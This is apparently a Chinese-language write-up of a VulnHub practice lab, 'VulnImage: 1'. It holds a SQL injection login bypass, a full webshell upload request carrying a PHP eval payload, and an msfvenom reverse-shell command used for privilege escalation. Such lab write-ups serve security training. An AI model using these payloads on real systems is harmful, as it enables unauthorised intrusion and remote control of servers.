VulnImage: 1
项目地址:https://download.vulnhub.com/vulnimage/vulnimage.zip
是一个打包好的镜像文件
注意:导入 vmx 时一定要选择我已移动,否则没网
使用 Nmap 扫描出开放服务及操作系统版本

访问 80 端口先找到一个发送博客的功能点

SQL 注入
Post(两个)

测试技巧
1 | # -p 指定参数测试 |


profile(两个)
同样也是账号密码

View
扫目录扫出这个页面,但是报错了,看样子是缺少 ID

补充上去页面回显不一样,说明思路是对的

XSS
Post(存储)
使用万能密码绕过后端校验就可能正常发送博客了


RCE
profile
扫描目录发现有个 /profiles

类似于日志文件,都可以点进去访问
文件名命名规则是随机数 + 用户名 + -- --sig.txt 结尾

使用插件在网页中发现一个隐藏元素

原来添加后缀是在前端做的,所以我们可以改掉

上传时使用万能密码绕过登录
1 | username=admin&password=admin'%20or%20'a'='a&sig=%3C%3Fphp%20%40eval(%24_POST%5B%22code%22%5D)%3F%3E&fname=webshell.php&submit=Submit |

这个时候就有我们的木马了

蚁剑连接成功

提权
内核 sendfile() 函数(CVE-2009-2692)
查看靶机内核版本,准备打内核漏洞(二进制的环境有问题)

通过 MSF 生成木马传到靶机上
1 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.202.128 LPORT=4444 -f elf -o exp.elf |

控制台中监听

靶机下载运行

按 Ctrl + Z 把当前会话放到后台

使用后渗透模块并设置参数

找这些能用的漏洞模块(绿色)

使用时要切换端口,避免占用

